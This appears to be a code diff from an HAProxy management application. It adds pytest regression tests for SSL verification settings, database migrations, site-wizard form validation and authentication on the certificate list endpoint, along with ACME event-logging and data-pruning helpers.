def test_frontend_config_ssl_verify_none_passthrough():
from models.frontend import FrontendConfig
# None and 'none' are distinct: None means "field omitted" while
# 'none' is the explicit Literal value — both are valid.
m1 = FrontendConfig(name="fe", bind_port=80)
assert m1.ssl_verify is None
m2 = FrontendConfig(name="fe", bind_port=80, ssl_verify=None)
assert m2.ssl_verify is None
# ─────────────────────────────────────────────────────────────────────────────
# Backend server (manual create endpoint)
# ─────────────────────────────────────────────────────────────────────────────
def test_server_config_ssl_verify_strict_literal_no_optional():
"""HAProxy server-line ssl_verify only supports `none|required`
(`optional` is a frontend-bind-only mode). The unified Literal
must reflect that and coerce a stale `'optional'` from old
payloads to None rather than rendering an invalid directive."""
from models.backend import ServerConfig
base = dict(server_name="srv1", server_address="10.0.0.1", server_port=80)
for v in ("none", "required"):
m = ServerConfig(**base, ssl_verify=v)
assert m.ssl_verify == v
# 'optional' is invalid server-side → coerce to None
m = ServerConfig(**base, ssl_verify="optional")
assert m.ssl_verify is None, (
"PR-2 R11.B regression: server-side `ssl_verify='optional'` "
"must coerce to None — HAProxy `server ... verify optional` "
"is invalid syntax."
)
# Free-form garbage → rejected
for bad in ("true", "yes", "1"):
with pytest.raises(ValidationError):
ServerConfig(**base, ssl_verify=bad)
def test_server_config_ssl_verify_empty_coerces_to_none():
from models.backend import ServerConfig
base = dict(server_name="srv1", server_address="10.0.0.1", server_port=80)
for empty in ("", "[]", "{}", "null"):
m = ServerConfig(**base, ssl_verify=empty)
assert m.ssl_verify is None
# ─────────────────────────────────────────────────────────────────────────────
# Wizard ServerStep + SSLChoice
# ─────────────────────────────────────────────────────────────────────────────
def test_wizard_serverstep_ssl_verify_empty_coerces_to_none():
from models.site_wizard import ServerStep
base = dict(server_name="srv1", server_address="10.0.0.1", server_port=80)
for empty in ("", "[]", "{}", "null"):
m = ServerStep(**base, ssl_verify=empty)
assert m.ssl_verify is None, (
f"PR-2 R11.B regression: ServerStep.ssl_verify={empty!r} "
"must coerce to None for UI form-clear compat."
)
# 'optional' is server-side invalid → coerce
m = ServerStep(**base, ssl_verify="optional")
assert m.ssl_verify is None
def test_wizard_sslchoice_ssl_verify_empty_coerces_to_none():
from models.site_wizard import SSLChoice
for empty in ("", "[]", "{}", "null"):
m = SSLChoice(mode="existing", ssl_certificate_id=1, ssl_verify=empty)
assert m.ssl_verify is None, (
f"PR-2 R11.B regression: SSLChoice.ssl_verify={empty!r} "
"must coerce to None for UI form-clear compat."
)
# Bulgu #26 (round-12 audit): only 'none' passes; the wizard
# rejects 'optional' and 'required' until the ca-file column is
# plumbed through (the renderer's client-CA path is a placeholder
# that silently drops the verify directive otherwise).
m = SSLChoice(mode="existing", ssl_certificate_id=1, ssl_verify="none")
assert m.ssl_verify == "none"
import pytest as _pytest
from pydantic import ValidationError as _ValidationError
for forbidden in ("optional", "required"):
with _pytest.raises(_ValidationError):
SSLChoice(mode="existing", ssl_certificate_id=1, ssl_verify=forbidden)
# ─────────────────────────────────────────────────────────────────────────────
# Migration source assertions (CREATE TABLE + ADD COLUMN + cleanup)
# ─────────────────────────────────────────────────────────────────────────────
def test_migration_no_legacy_default_optional():
"""Both the CREATE TABLE and the ADD COLUMN paths in
`database/migrations.py` must NOT emit ``DEFAULT 'optional'``
on the frontends.ssl_verify column. Pre-PR-2 every newly INSERTed
frontend row carried `'optional'`, which combined with the absent
client-CA column produced the user-reported fatal HAProxy ALERT.
"""
src = (_BACK / "database" / "migrations.py").read_text()
# ADD COLUMN path must omit DEFAULT 'optional'
assert "ADD COLUMN ssl_verify VARCHAR(50) DEFAULT 'optional'" not in src, (
"PR-2 R11.B regression: ssl_verify ADD COLUMN still emits the "
"legacy `DEFAULT 'optional'` clause."
)
# CREATE TABLE path must not have DEFAULT 'optional'
assert "ssl_verify VARCHAR(20) DEFAULT 'optional'" not in src, (
"PR-2 R11.B regression: ssl_verify CREATE TABLE still emits the "
"legacy `DEFAULT 'optional'` clause."
)
def test_migration_drops_legacy_default_in_place():
"""Already-deployed databases need an in-place ALTER ... DROP
DEFAULT to remove the legacy default. The cleanup must be
idempotent (safe to re-run on databases that already had the
column flipped)."""
src = (_BACK / "database" / "migrations.py").read_text()
assert "ALTER COLUMN ssl_verify DROP DEFAULT" in src, (
"PR-2 R11.B regression: missing in-place DROP DEFAULT for "
"frontends.ssl_verify on already-deployed databases."
)
def test_migration_cleans_up_invalid_values_only():
"""The cleanup migration must NULL only rows OUTSIDE the canonical
Literal set — operator-set valid values are preserved."""
src = (_BACK / "database" / "migrations.py").read_text()
assert "NOT IN ('none', 'optional', 'required')" in src, (
"PR-2 R11.B regression: ssl_verify cleanup migration is "
"missing or its WHERE clause is wrong (must filter to "
"values outside the canonical Literal set only)."
)
# Sanity: it must not blanket-reset all rows
assert "UPDATE frontends SET ssl_verify = NULL" not in src or \
"WHERE ssl_verify IS NOT NULL" in src, (
"PR-2 R11.B safety: cleanup must not blanket-NULL operator-set "
"values — only rows outside the Literal set."
)
@@ -0,0 +1,121 @@
"""v1.5.0 R17 — Wizard step-validation regression tests.
Pre-R17 the `Next` button on Step 1 (Backend & Servers) called
`form.validateFields(['servers'])` — Antd's behaviour for that path is to
validate the Form.List wrapper itself, NOT the per-row required rules.
Result: a user could leave Server Address blank and `Next` would happily
advance, the error surfacing only at the final submit. R17 walks every
required nested path explicitly via `serverRows.flatMap`.
Same pattern extended to Step 3 (SSL): only when ssl.mode='upload' or
'existing' do we validate the conditional required fields, so users in
'acme' mode aren't blocked by upload-only validators.
"""
import re
from pathlib import Path
import pytest
_WIZARD_JS = (
Path(__file__).resolve().parent.parent.parent
/ "frontend"
/ "src"
/ "components"
/ "SiteWizard.js"
)
def _wizard_src():
if not _WIZARD_JS.exists():
pytest.skip(
"frontend tree not mounted — backend-only test environments "
"skip JS source assertions"
)
return _WIZARD_JS.read_text()
# ----------------- Step 1: per-row server validation -----------------
def test_step1_validates_each_server_row_explicitly():
"""The flatMap over serverRows must expand the required server
paths — without it Antd's validateFields(['servers']) only walks the
Form.List metadata, leaving Address-blank rows undetected."""
src = _wizard_src()
assert "serverRows.flatMap" in src, (
"R17 regression: per-row server validation pattern missing — "
"Step 1 Next will not catch blank Address until submit time"
)
# The three required paths must all be covered.
for field in ("server_name", "server_address", "server_port"):
assert re.search(
rf"\['servers',\s*i,\s*'{field}'\]",
src,
), f"R17 regression: server.{field} dropped from per-row validation"
def test_step1_validation_still_includes_backend_name():
"""We must still validate the Backend Name on Step 1 — otherwise
advancing to the Frontend step with a blank backend.name would only
fail at submit."""
src = _wizard_src()
assert re.search(
r"validateFields\(\s*\[\s*\['backend',\s*'name'\]",
src,
), "R17 regression: backend.name validation dropped from Step 1 Next"
# ----------------- Step 3: SSL conditional validation -----------------
def test_step3_validates_upload_required_fields():
"""When ssl.mode='upload' the Next button must validate name +
certificate_content + private_key_content. Without this, users get
bounced back to the SSL step from Review with cryptic Pydantic
errors."""
src = _wizard_src()
# The conditional block must check upload mode and validate all 3 PEM-related fields.
assert re.search(r"mode\s*===\s*'upload'", src), (
"R17 regression: Step 3 Next no longer branches on ssl.mode='upload'"
)
for field in ("name", "certificate_content", "private_key_content"):
assert re.search(
rf"\['ssl',\s*'{field}'\]",
src,
), f"R17 regression: ssl.{field} dropped from Step 3 upload-mode validation"
def test_step3_validates_existing_mode_picks_cert_id():
"""ssl.mode='existing' must validate ssl.ssl_certificate_id. Skipping
this lets users advance with no cert selected and crash at submit."""
src = _wizard_src()
assert re.search(r"mode\s*===\s*'existing'", src), (
"R17 regression: Step 3 Next no longer branches on ssl.mode='existing'"
)
assert re.search(
r"\['ssl',\s*'ssl_certificate_id'\]",
src,
), "R17 regression: ssl.ssl_certificate_id dropped from Step 3 existing-mode validation"
def test_step3_does_not_block_acme_with_upload_only_validators():
"""Important: ssl.mode='acme' has none of name/certificate_content/
private_key_content/ssl_certificate_id — those validators must NOT
run when mode='acme'. We verify by ensuring the upload/existing
blocks are guarded by mode equality checks (i.e. they don't run
unconditionally)."""
src = _wizard_src()
# Look for a Step 3 (step === 3) block that gates by mode equality.
block_match = re.search(
r"if\s*\(\s*step\s*===\s*3\s*\)\s*\{(.*?)\}\s*setStep",
src,
re.DOTALL,
)
assert block_match, "R17 regression: Step 3 validation block not found"
block = block_match.group(1)
# Must NOT validate certificate_content unconditionally.
assert "if (mode" in block or "mode ===" in block, (
"R17 regression: Step 3 validation runs unconditionally — would "
"block ACME users from leaving the SSL step"
)
+125
View File
@@ -0,0 +1,125 @@
"""v1.5.0 R15 hotfix — TDZ (Temporal Dead Zone) regression guard.
The original v1.5.0 R12-R14 wizard JSX referenced `sslMode` inside the
stepContents array literal (e.g. `{sslMode === 'acme' && (<Alert .../>)}`),
but the actual `const sslMode = Form.useWatch(...)` lived ~40 lines
BELOW the array literal. That's a const referenced before its
declaration in the same render scope.
In dev mode webpack/SWC keep the original variable names so the JS
engine's TDZ check often happens to short-circuit on undefined access
(or the eager re-render cycle re-evaluates with sslMode already bound),
but the production minified build produced the user-facing crash:
ReferenceError: Cannot access 'N' before initialization
at Fde (SiteWizard.js:1093:12)
R15 hotfix: hoist `const sslMode = Form.useWatch(...)` and
`const acmeBlocksDraft = ...` to the top of the component, immediately
after the state hooks, so every downstream JSX expression sees them
already initialised.
This test pins the ordering with a static source assertion. Failure
means someone moved the watcher back below stepContents and the bug is
about to ship to prod.
"""
from pathlib import Path
import pytest
_WIZARD_PATH = (
Path(__file__).resolve().parent.parent.parent
/ "frontend"
/ "src"
/ "components"
/ "SiteWizard.js"
)
if not _WIZARD_PATH.exists():
pytest.skip(
f"frontend not present at {_WIZARD_PATH}; backend-only container "
"is expected — skip wizard JS source assertions",
allow_module_level=True,
)
WIZARD_JS = _WIZARD_PATH.read_text()
LINES = WIZARD_JS.splitlines()
def _line_of(needle: str) -> int:
"""Return the 1-based line number of the first line containing
`needle`, or raise AssertionError if not found."""
for i, line in enumerate(LINES, start=1):
if needle in line:
return i
raise AssertionError(f"expected to find {needle!r} in SiteWizard.js")
def test_form_use_watch_for_sslmode_appears_only_once():
"""`Form.useWatch(['ssl', 'mode'], form)` must be declared exactly
once. Any duplicate (forgotten leftover from R15 hoisting) means
React would call useWatch twice per render — wasteful, and risks
re-introducing the TDZ if the second declaration shadows the first."""
occurrences = WIZARD_JS.count("Form.useWatch(['ssl', 'mode'], form)")
assert occurrences == 1, (
f"R15 regression: Form.useWatch(['ssl', 'mode'], form) appears "
f"{occurrences} times. Expected exactly 1 — duplicate watchers "
"are wasted and may shadow each other."
)
def test_sslmode_declared_before_stepcontents():
"""The TDZ fix: `const sslMode = ...` must come BEFORE the
`stepContents` array literal which references sslMode inline."""
sslmode_line = _line_of("const sslMode = Form.useWatch")
stepcontents_line = _line_of("const stepContents = [")
assert sslmode_line < stepcontents_line, (
f"R15 regression: const sslMode is declared at line {sslmode_line} "
f"but stepContents (which references sslMode) starts at line "
f"{stepcontents_line}. With the production minifier this becomes "
"a TDZ crash: \"Cannot access 'N' before initialization\"."
)
def test_acme_blocks_draft_declared_with_sslmode():
"""SUPERSEDED by Phase K Phase D (Bulgu #6).
The `acmeBlocksDraft` const was the TDZ-safe derivation that
fed the (now-retired) "Create as PENDING" button's disabled
state. With the unified single-button UI, the derivation is
no longer needed — handleSubmit's `effectiveApply = sslModeAtSubmit
=== 'acme'` does the same job at submit time. We re-pin the
NEW constraint: the unified button label `submitButtonLabel`
must be derived AFTER sslMode (consistent with the original
R15 TDZ-safety contract) and BEFORE the JSX that consumes it.
"""
sslmode_line = _line_of("const sslMode = Form.useWatch")
submit_label_line = _line_of("const submitButtonLabel =")
button_consumption_line = _line_of("{submitButtonLabel}")
assert sslmode_line < submit_label_line < button_consumption_line, (
f"Phase K Phase D regression: TDZ ordering. sslMode at "
f"line {sslmode_line}, submitButtonLabel at {submit_label_line}, "
f"button consumption at {button_consumption_line}. "
"submitButtonLabel must be declared AFTER sslMode and "
"BEFORE the button JSX that consumes it."
)
def test_no_late_redeclaration_of_sslmode_after_stepcontents():
"""Make sure no leftover `const sslMode = Form.useWatch(...)` lingers
AFTER stepContents (would shadow the hoisted one and re-trigger the
TDZ in production)."""
stepcontents_line = _line_of("const stepContents = [")
# Find every line that declares sslMode via useWatch.
decls = [
i + 1 for i, line in enumerate(LINES)
if "const sslMode = Form.useWatch" in line
]
late = [d for d in decls if d > stepcontents_line]
assert not late, (
f"R15 regression: const sslMode = Form.useWatch redeclared at "
f"line(s) {late}, AFTER stepContents at line {stepcontents_line}. "
"Either the hoisted top-of-component declaration was reverted, "
"or a duplicate was added."
)
@@ -0,0 +1,47 @@
"""v1.5.0 R18 audit ROUND 4 — behavioral test for the SSL list endpoint
authentication fix.
Round 2 added an auth guard to GET /api/ssl/certificates. That fix had
only static-source coverage. Round 4 adds a behavioral assertion via
FastAPI's TestClient: an HTTP request without an Authorization header
must NOT receive 200 — it must be rejected with 401 (or whatever the
shared auth_middleware produces) to prevent anonymous enumeration.
We use the existing `client` fixture from conftest. The exact status
may be 401 (Unauthorized) or 403 (Forbidden) depending on the
auth_middleware policy; either is acceptable as long as the response
is NOT a 200 with cert data.
"""
import pytest
def test_ssl_list_unauthenticated_request_rejected(client):
"""No Authorization header → endpoint must refuse the request."""
res = client.get("/api/ssl/certificates")
# Anything in the auth-failure family is fine; what we forbid is
# 200-with-data (which was the pre-R18 leak).
assert res.status_code in (401, 403, 422), (
f"R18 audit (round 4) regression: GET /api/ssl/certificates "
f"without Authorization returned {res.status_code} — anonymous "
f"enumeration of SSL certificate metadata is possible again. "
f"Body: {res.text[:200]}"
)
# Defensive check: even if some misconfiguration returned 200,
# the body must not be a list of certs.
if res.status_code == 200:
data = res.json()
assert not isinstance(data, list) or len(data) == 0, (
"R18 audit regression: SSL list returned data without auth"
)
def test_ssl_list_with_invalid_token_rejected(client):
"""Garbage token → endpoint must refuse the request."""
res = client.get(
"/api/ssl/certificates",
headers={"Authorization": "Bearer not-a-valid-jwt"},
)
assert res.status_code in (401, 403, 422), (
f"R18 audit (round 4) regression: GET /api/ssl/certificates "
f"with an invalid token returned {res.status_code}"
)
@@ -0,0 +1,355 @@
"""
v1.5.0 service extraction parity — ssl_service.
Asserts:
- create_cert_row inserts with cluster_id=NULL on the cert row itself, then
binds via the junction (R38 schema).
- ensure_cluster_junction is idempotent via ON CONFLICT DO NOTHING (M11).
- select_existing_cert returns id only when row is_active.
Phase K Phase D follow-up (Bulgu #9) — `create_cert_row` now parses
the PEM via `utils.ssl_parser.parse_ssl_certificate` and validates
the private key + chain before INSERT (parity with the SSL
Management page). Tests patch the parser/validators with valid
return values; an additional negative-path test pins the
HTTPException flow for invalid input.
"""
import json
from datetime import datetime, timezone
from types import SimpleNamespace
from unittest.mock import AsyncMock, patch
import pytest
from services.ssl_service import (
create_cert_row,
ensure_cluster_junction,
select_existing_cert,
)
# ----------------------------------------------------------------------------
# Test helpers
# ----------------------------------------------------------------------------
_VALID_PARSE = {
"primary_domain": "www.example.com",
"all_domains": ["www.example.com"],
"expiry_date": datetime(2099, 1, 1, tzinfo=timezone.utc),
"issuer": "CN=Test CA",
"fingerprint": "AA:BB:CC",
"status": "valid",
"days_until_expiry": 365,
}
def _mock_parse_ok(*args, **kwargs):
return dict(_VALID_PARSE)
# ----------------------------------------------------------------------------
# create_cert_row
# ----------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_create_cert_row_inserts_cluster_id_null():
"""R38: ssl_certificates.cluster_id MUST always be NULL — junction is the truth."""
conn = AsyncMock()
conn.fetchval.return_value = 33
conn.fetchrow.return_value = None # no existing cert with same name
payload = SimpleNamespace(
name="cert-www",
primary_domain="www.example.com",
certificate_content="-----BEGIN CERTIFICATE-----\nXX\n-----END CERTIFICATE-----",
private_key_content="-----BEGIN PRIVATE KEY-----\nYY\n-----END PRIVATE KEY-----",
chain_content=None,
all_domains=["www.example.com"],
)
with patch("services.ssl_service.parse_ssl_certificate", side_effect=_mock_parse_ok), \
patch("services.ssl_service.validate_private_key", return_value=True), \
patch("services.ssl_service.validate_certificate_chain", return_value=True):
new_id = await create_cert_row(conn, payload, cluster_id=2)
assert new_id == 33
sql, *_ = conn.fetchval.call_args.args
# The literal NULL on cluster_id is part of the templated SQL string.
assert "cluster_id, last_config_status" in sql
assert "NULL, 'PENDING'" in sql
# Junction must be inserted exactly once.
junction_calls = [
c for c in conn.execute.call_args_list
if c.args and "ssl_certificate_clusters" in c.args[0]
]
assert len(junction_calls) == 1
assert junction_calls[0].args[1] == 33 # ssl_certificate_id
assert junction_calls[0].args[2] == 2 # cluster_id
@pytest.mark.asyncio
async def test_create_cert_row_serializes_all_domains_jsonb():
conn = AsyncMock()
conn.fetchval.return_value = 1
conn.fetchrow.return_value = None
payload = SimpleNamespace(
name="cert", primary_domain="a.example.com",
certificate_content="-----BEGIN CERTIFICATE-----\nX\n-----END CERTIFICATE-----",
private_key_content="-----BEGIN PRIVATE KEY-----\nY\n-----END PRIVATE KEY-----",
chain_content=None,
all_domains=["a.example.com", "b.example.com"],
)
parse_result = dict(_VALID_PARSE)
parse_result["primary_domain"] = "a.example.com"
parse_result["all_domains"] = ["a.example.com", "b.example.com"]
with patch("services.ssl_service.parse_ssl_certificate", return_value=parse_result), \
patch("services.ssl_service.validate_private_key", return_value=True), \
patch("services.ssl_service.validate_certificate_chain", return_value=True):
await create_cert_row(conn, payload, cluster_id=1)
sql, *args = conn.fetchval.call_args.args
# all_domains is the 11th positional ($11) — after the new
# parsed `status` + `days_until_expiry` columns.
assert json.loads(args[10]) == ["a.example.com", "b.example.com"]
@pytest.mark.asyncio
async def test_create_cert_row_rejects_invalid_pem_with_400():
"""Phase K Phase D (Bulgu #9) — `create_cert_row` must raise
HTTPException(400) when the PEM cannot be parsed. Pre-fix the
wizard silently accepted any string and stored a row with NULL
expiry/issuer/fingerprint, then HAProxy would fail at apply.
"""
from fastapi import HTTPException
conn = AsyncMock()
payload = SimpleNamespace(
name="bad",
certificate_content="not a pem",
private_key_content=None,
chain_content=None,
)
with patch(
"services.ssl_service.parse_ssl_certificate",
return_value={"error": "Could not parse certificate"},
):
with pytest.raises(HTTPException) as exc_info:
await create_cert_row(conn, payload, cluster_id=1)
assert exc_info.value.status_code == 400
assert "Invalid SSL certificate" in exc_info.value.detail
@pytest.mark.asyncio
async def test_create_cert_row_rejects_empty_certificate_content():
"""An empty cert content string must short-circuit BEFORE the
parser runs — clear UX for the operator who left the field blank.
"""
from fastapi import HTTPException
conn = AsyncMock()
payload = SimpleNamespace(
name="empty",
certificate_content="",
private_key_content=None,
chain_content=None,
)
with pytest.raises(HTTPException) as exc_info:
await create_cert_row(conn, payload, cluster_id=1)
assert exc_info.value.status_code == 400
assert "empty" in exc_info.value.detail.lower()
@pytest.mark.asyncio
async def test_create_cert_row_rejects_invalid_private_key_with_400():
from fastapi import HTTPException
conn = AsyncMock()
payload = SimpleNamespace(
name="bad-key",
certificate_content="-----BEGIN CERTIFICATE-----\nX\n-----END CERTIFICATE-----",
private_key_content="this is not a private key",
chain_content=None,
)
with patch("services.ssl_service.parse_ssl_certificate", side_effect=_mock_parse_ok), \
patch("services.ssl_service.validate_private_key", return_value=False):
with pytest.raises(HTTPException) as exc_info:
await create_cert_row(conn, payload, cluster_id=1)
assert exc_info.value.status_code == 400
assert "private key" in exc_info.value.detail.lower()
@pytest.mark.asyncio
async def test_create_cert_row_rejects_invalid_chain_with_400():
from fastapi import HTTPException
conn = AsyncMock()
payload = SimpleNamespace(
name="bad-chain",
certificate_content="-----BEGIN CERTIFICATE-----\nX\n-----END CERTIFICATE-----",
private_key_content=None,
chain_content="not a chain",
)
with patch("services.ssl_service.parse_ssl_certificate", side_effect=_mock_parse_ok), \
patch("services.ssl_service.validate_certificate_chain", return_value=False):
with pytest.raises(HTTPException) as exc_info:
await create_cert_row(conn, payload, cluster_id=1)
assert exc_info.value.status_code == 400
assert "chain" in exc_info.value.detail.lower()
@pytest.mark.asyncio
async def test_create_cert_row_rejects_duplicate_active_name_with_400():
"""Mirror the SSL Management page's name-conflict response
(ssl.py:462-468). Pre-fix the wizard would either succeed
(creating a duplicate row that broke the unique constraint at
INSERT — 500) or fail with an opaque DB error. Now we return a
friendly 400 the wizard surfaces as a step-jumpback toast.
"""
from fastapi import HTTPException
conn = AsyncMock()
# Existing active cert with same name in this cluster.
conn.fetchrow.return_value = {"id": 99, "is_active": True}
payload = SimpleNamespace(
name="duplicate",
certificate_content="-----BEGIN CERTIFICATE-----\nX\n-----END CERTIFICATE-----",
private_key_content="-----BEGIN PRIVATE KEY-----\nY\n-----END PRIVATE KEY-----",
chain_content=None,
)
with patch("services.ssl_service.parse_ssl_certificate", side_effect=_mock_parse_ok), \
patch("services.ssl_service.validate_private_key", return_value=True), \
patch("services.ssl_service.validate_certificate_chain", return_value=True):
with pytest.raises(HTTPException) as exc_info:
await create_cert_row(conn, payload, cluster_id=1)
assert exc_info.value.status_code == 400
assert "already exists" in exc_info.value.detail.lower()
@pytest.mark.asyncio
async def test_create_cert_row_reactivates_soft_deleted_name():
"""Mirror ssl.py:470-500 — when a soft-deleted cert exists with
the same name (is_active=False), reuse its row id and UPDATE
contents instead of inserting a duplicate. Preserves any
downstream references (auditor history, version names that
embedded the cert id, etc.).
"""
conn = AsyncMock()
conn.fetchrow.return_value = {"id": 77, "is_active": False}
payload = SimpleNamespace(
name="recycled",
certificate_content="-----BEGIN CERTIFICATE-----\nX\n-----END CERTIFICATE-----",
private_key_content="-----BEGIN PRIVATE KEY-----\nY\n-----END PRIVATE KEY-----",
chain_content=None,
)
with patch("services.ssl_service.parse_ssl_certificate", side_effect=_mock_parse_ok), \
patch("services.ssl_service.validate_private_key", return_value=True), \
patch("services.ssl_service.validate_certificate_chain", return_value=True):
new_id = await create_cert_row(conn, payload, cluster_id=1)
assert new_id == 77
# We must NOT have INSERTed (no fetchval call), only UPDATEd + DELETEd-junction + re-INSERTed junction.
assert not conn.fetchval.await_count
# And `UPDATE ssl_certificates ... is_active = TRUE` must have run.
update_calls = [
c for c in conn.execute.call_args_list
if c.args and "UPDATE ssl_certificates" in c.args[0]
]
assert len(update_calls) == 1, "soft-deleted cert reactivation must run a single UPDATE"
@pytest.mark.asyncio
async def test_create_cert_row_parses_metadata_from_pem_not_payload():
"""Phase K Phase D (Bulgu #9) — primary_domain / all_domains /
expiry_date / issuer / fingerprint / status / days_until_expiry
MUST come from the parsed certificate, NOT from operator-typed
domain fields on the wizard. Pre-fix the wizard inserted the
user's frontend domains into the SSL row even when the cert
SAN was different — confusing UX on the SSL Management page.
"""
conn = AsyncMock()
conn.fetchval.return_value = 123
conn.fetchrow.return_value = None
payload = SimpleNamespace(
# Operator typed `app.example.com` for the frontend domain,
# but the cert SAN is `*.example.com`.
name="cert-from-pem",
primary_domain="app.example.com",
all_domains=["app.example.com"],
certificate_content="-----BEGIN CERTIFICATE-----\nX\n-----END CERTIFICATE-----",
private_key_content="-----BEGIN PRIVATE KEY-----\nY\n-----END PRIVATE KEY-----",
chain_content=None,
)
cert_parse = dict(_VALID_PARSE)
cert_parse["primary_domain"] = "*.example.com"
cert_parse["all_domains"] = ["*.example.com", "www.example.com"]
cert_parse["issuer"] = "CN=R3"
cert_parse["fingerprint"] = "DE:AD:BE:EF"
with patch("services.ssl_service.parse_ssl_certificate", return_value=cert_parse), \
patch("services.ssl_service.validate_private_key", return_value=True), \
patch("services.ssl_service.validate_certificate_chain", return_value=True):
await create_cert_row(conn, payload, cluster_id=1)
sql, *args = conn.fetchval.call_args.args
# primary_domain is $2 → args[1]
assert args[1] == "*.example.com", (
"primary_domain must come from the parsed PEM, not the "
"operator-typed frontend domain"
)
# all_domains is now $11 → args[10] (post-Bulgu #9 column order)
assert json.loads(args[10]) == ["*.example.com", "www.example.com"]
# issuer $7 → args[6], fingerprint $8 → args[7]
assert args[6] == "CN=R3"
assert args[7] == "DE:AD:BE:EF"
# ----------------------------------------------------------------------------
# ensure_cluster_junction (M11 idempotency)
# ----------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_ensure_cluster_junction_uses_on_conflict_do_nothing():
conn = AsyncMock()
await ensure_cluster_junction(conn, ssl_certificate_id=1, cluster_id=2)
sql, *_ = conn.execute.call_args.args
assert "INSERT INTO ssl_certificate_clusters" in sql
assert "ON CONFLICT" in sql
assert "DO NOTHING" in sql
@pytest.mark.asyncio
async def test_ensure_cluster_junction_can_be_called_twice_safely():
"""Idempotency at the helper level — repeated calls must not raise."""
conn = AsyncMock()
await ensure_cluster_junction(conn, 1, 2)
await ensure_cluster_junction(conn, 1, 2)
assert conn.execute.await_count == 2
# ----------------------------------------------------------------------------
# select_existing_cert
# ----------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_select_existing_cert_returns_id_when_active():
conn = AsyncMock()
conn.fetchrow.return_value = {"id": 7}
out = await select_existing_cert(conn, ssl_certificate_id=7, cluster_id=1)
assert out == 7
# Junction must be ensured even on existing-cert reuse (idempotent).
junction_calls = [c for c in conn.execute.call_args_list
if c.args and "ssl_certificate_clusters" in c.args[0]]
assert len(junction_calls) == 1
@pytest.mark.asyncio
async def test_select_existing_cert_returns_none_when_inactive_or_missing():
conn = AsyncMock()
conn.fetchrow.return_value = None
out = await select_existing_cert(conn, ssl_certificate_id=7, cluster_id=1)
assert out is None
# Junction must NOT be inserted for non-existent certs.
assert all(
not (c.args and "ssl_certificate_clusters" in c.args[0])
for c in conn.execute.call_args_list
)
+171 -1
View File
@@ -99,4 +99,174 @@ async def get_user_activity_logs(
except Exception as e:
logger.error(f"Failed to get user activity logs: {e}")
return []
return []
# ----------------------------------------------------------------------------
# v1.5.0 Feature A (Issue #13): typed ACME order event log helper
# ----------------------------------------------------------------------------
async def record_event(
order_id: int,
event_type: str,
*,
severity: str = "INFO",
message: Optional[str] = None,
details: Optional[Dict[str, Any]] = None,
correlation_id: Optional[str] = None,
conn=None,
) -> Optional[int]:
"""Insert a typed event row into acme_order_events.
Wrapped in try/except so that an event-log DB failure NEVER breaks the
main ACME flow (Section 5.2 of the v1.5.0 plan).
M24: when `conn` is passed in (e.g. inside the
complete_pending_acme_orders pool-pressure-sensitive task), reuse the
existing connection instead of acquiring a new one from the pool.
Returns the inserted row id, or None on failure.
"""
own_conn = False
try:
if conn is None:
conn = await get_database_connection()
own_conn = True
details_json = json.dumps(details or {}) if not isinstance(details, str) else details
try:
row_id = await conn.fetchval(
"""
INSERT INTO acme_order_events (
order_id, event_type, severity, message, details, correlation_id
) VALUES ($1, $2, $3, $4, $5::jsonb, $6)
RETURNING id
""",
order_id,
event_type,
severity.upper() if severity else "INFO",
message,
details_json,
correlation_id,
)
return row_id
except Exception as e:
# Most likely cause: acme_order_events table missing in older
# deployments (migration not yet run). NEVER raise.
logger.debug(
f"record_event: insert failed (order_id={order_id}, "
f"event_type={event_type}): {e}"
)
return None
except Exception as e:
logger.debug(f"record_event: outer failure (order_id={order_id}): {e}")
return None
finally:
if own_conn and conn is not None:
try:
await close_database_connection(conn)
except Exception:
pass
async def prune_acme_events_and_drafts_if_due() -> Dict[str, int]:
"""Daily-watermarked TTL prune (M30 / Section 5.3 of v1.5.0 plan).
- acme_order_events: 90d retention.
- wizard_drafts: 30d retention (also pruned by expires_at < NOW() since
that column exists explicitly).
Watermarking via system_settings (dot-notation keys —
`acme.events_last_pruned_at` / `wizard.drafts_last_pruned_at`)
ensures multi-replica deployments only run the prune once per day.
Always returns a dict with the (possibly zero) prune counts. Never raises.
"""
counts = {"acme_events": 0, "wizard_drafts": 0}
conn = None
try:
conn = await get_database_connection()
async def _maybe_run(setting_key: str, ttl_query: str) -> int:
"""Returns # rows pruned, or 0 if not yet due."""
try:
row = await conn.fetchrow(
"SELECT value FROM system_settings WHERE key = $1",
setting_key,
)
last_at: Optional[datetime] = None
if row and row["value"] is not None:
raw = row["value"]
if isinstance(raw, str):
try:
raw = json.loads(raw)
except json.JSONDecodeError:
raw = None
if isinstance(raw, str):
try:
last_at = datetime.fromisoformat(raw.replace("Z", "+00:00"))
except ValueError:
last_at = None
if last_at is not None:
age_seconds = (datetime.utcnow() - last_at.replace(tzinfo=None)).total_seconds()
if age_seconds < 24 * 3600:
return 0
result = await conn.execute(ttl_query)
count = 0
if isinstance(result, str) and result.startswith("DELETE "):
try:
count = int(result.split()[-1])
except (ValueError, IndexError):
count = 0
ts_value = json.dumps(datetime.utcnow().isoformat() + "Z")
await conn.execute(
"""
INSERT INTO system_settings (key, value, category, description)
VALUES ($1, $2::jsonb, $3, $4)
ON CONFLICT (key) DO UPDATE
SET value = EXCLUDED.value, updated_at = CURRENT_TIMESTAMP
""",
setting_key,
ts_value,
"acme" if setting_key.startswith("acme.") else "wizard",
"Internal: last daily prune timestamp (v1.5.0)",
)
return count
except Exception as inner:
logger.debug(f"prune watermark step failed for {setting_key}: {inner}")
return 0
# acme_order_events 90d
counts["acme_events"] = await _maybe_run(
"acme.events_last_pruned_at",
"DELETE FROM acme_order_events WHERE created_at < NOW() - INTERVAL '90 days'",
)
# wizard_drafts 30d (also catches expires_at-passed rows)
counts["wizard_drafts"] = await _maybe_run(
"wizard.drafts_last_pruned_at",
"""
DELETE FROM wizard_drafts
WHERE created_at < NOW() - INTERVAL '30 days'
OR expires_at < NOW()
""",
)
if counts["acme_events"] or counts["wizard_drafts"]:
logger.info(
f"v1.5.0 daily prune: acme_events={counts['acme_events']} "
f"wizard_drafts={counts['wizard_drafts']}"
)
return counts
except Exception as e:
logger.debug(f"prune_acme_events_and_drafts_if_due: {e}")
return counts
finally:
if conn is not None:
try:
await close_database_connection(conn)
except Exception:
pass
+77
View File
@@ -0,0 +1,77 @@
"""
Single source of truth for domain regex validation (M10).
Mirrored client-side at frontend/src/utils/validation.js. Both sides MUST be
updated together; the wizard's per-step validation relies on byte-identical
